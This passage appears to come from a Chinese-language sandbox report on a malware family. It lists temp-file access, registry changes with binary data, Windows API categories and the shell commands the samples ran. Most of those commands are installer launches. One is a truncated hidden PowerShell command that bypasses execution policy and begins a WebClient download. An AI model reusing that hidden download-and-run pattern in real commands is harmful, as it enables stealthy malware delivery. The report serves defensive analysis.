| c:\users\user\appdata\local\temp\nsrfa35.tmp | Generic Read,Write Data,Write Attributes,Write extended,Append data,Delete |
| c:\users\user\appdata\local\temp\nsva331.tmp\banner.dll | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\nsva331.tmp\nsexec.dll | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\nsva331.tmp\system.dll | Generic Write,Read Attributes |
注册表修改
注册表修改
本节列出了此系列样本创建、修改和/或删除的注册表项和值。Windows 注册表活动可以提供关于恶意软件功能的宝贵信息。此外,恶意软件通常会创建注册表值,以便在初始感染系统后自动启动并无限期地持续存在。| 键::值 | 数据 | API名称 |
|---|---|---|
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 | wk � 8�jg�B �� �6 �v�� 7� �� �� ۀ�� � T�B� ����� ���%�� 3bBx �<�� �!#��$kF$�� %`� %�&� &�-'�!(�(X�(�) ;)E)�`*J*9*�",=� -!R0P%1`1�1HO 5,]5�G>�� @V� @�*A��BB�� E�mF | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | 졷鑂셱ǜ | RegNtPreCreateKey |
Windows API 使用情况
Windows API 使用情况
本节列出了此系列样本使用的 Windows API 调用。Windows API 使用情况分析是一项宝贵的工具,可以帮助识别恶意活动,例如键盘记录、安全权限提升、数据加密、数据泄露、干扰防病毒软件以及网络请求篡改。| 类别 | API |
|---|---|
| Other Suspicious |
|
| Anti Debug |
|
| User Data Access |
|
| Process Manipulation Evasion |
|
| Process Shell Execute |
|
| Keyboard Access |
|
| Syscall Use |
显示更多
|
| Encryption Used |
|
Shell命令执行
Shell命令执行
本节列出了此系列样本运行的 Windows Shell 命令。恶意软件经常利用 Windows Shell 命令进行恶意活动,例如提升安全权限、下载和启动其他恶意软件、利用漏洞、收集和窃取数据以及隐藏恶意活动。
"C:\Users\Lehsoaco\AppData\Local\Temp\is-88UAN.tmp\ea7edc388ad62990f52b9ed40df26d20f4e20190_0001359918.tmp" /SL5="$5036E,928289,131584,c:\users\user\downloads\ea7edc388ad62990f52b9ed40df26d20f4e20190_0001359918"
|
"C:\Users\Dfhrhqtz\AppData\Local\Temp\is-13E8D.tmp\508cea3ba2bf04cc6851295f92bf0e752071f6b8_0001328186.tmp" /SL5="$802E8,896816,131584,c:\users\user\downloads\508cea3ba2bf04cc6851295f92bf0e752071f6b8_0001328186"
|
"C:\Users\Eberzneu\AppData\Local\Temp\is-DU263.tmp\326da9ddc0ea840e83f31fbf1f3377a06c911fe5_0001364106.tmp" /SL5="$30364,932379,131584,c:\users\user\downloads\326da9ddc0ea840e83f31fbf1f3377a06c911fe5_0001364106"
|
"C:\Users\Qxnqehmu\AppData\Local\Temp\is-8GKJI.tmp\0cc5781c1cfe6c5d034bd098229773e80e083732_0004858569.tmp" /SL5="$402E8,3435751,309760,c:\users\user\downloads\0cc5781c1cfe6c5d034bd098229773e80e083732_0004858569"
|
"C:\Users\Qlwpcgcn\AppData\Local\Temp\is-I0KJ9.tmp\6908790199785be7fc6c4eeb1fe426ee1b66cc0b_0001406899.tmp" /SL5="$30336,975597,131584,c:\users\user\downloads\6908790199785be7fc6c4eeb1fe426ee1b66cc0b_0001406899"
|
显示更多
powershell -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "try { $WebClient = New-Object System.Net.WebClient
|
"C:\Users\Czxnhiuo\AppData\Local\Temp\is-L4OPD.tmp\cc1bd23b0c7ff5da8ff996717b3969b7ebb9c67b_0001363661.tmp" /SL5="$40356,931898,131584,c:\users\user\downloads\cc1bd23b0c7ff5da8ff996717b3969b7ebb9c67b_0001363661"
|
"C:\Users\Rziyzfeg\AppData\Local\Temp\is-DLUCN.tmp\7604b8cd9736a016748a1d2d1fe3eb9ec9db1bc9_0001407173.tmp" /SL5="$1C02AC,975756,131584,c:\users\user\downloads\7604b8cd9736a016748a1d2d1fe3eb9ec9db1bc9_0001407173"
|

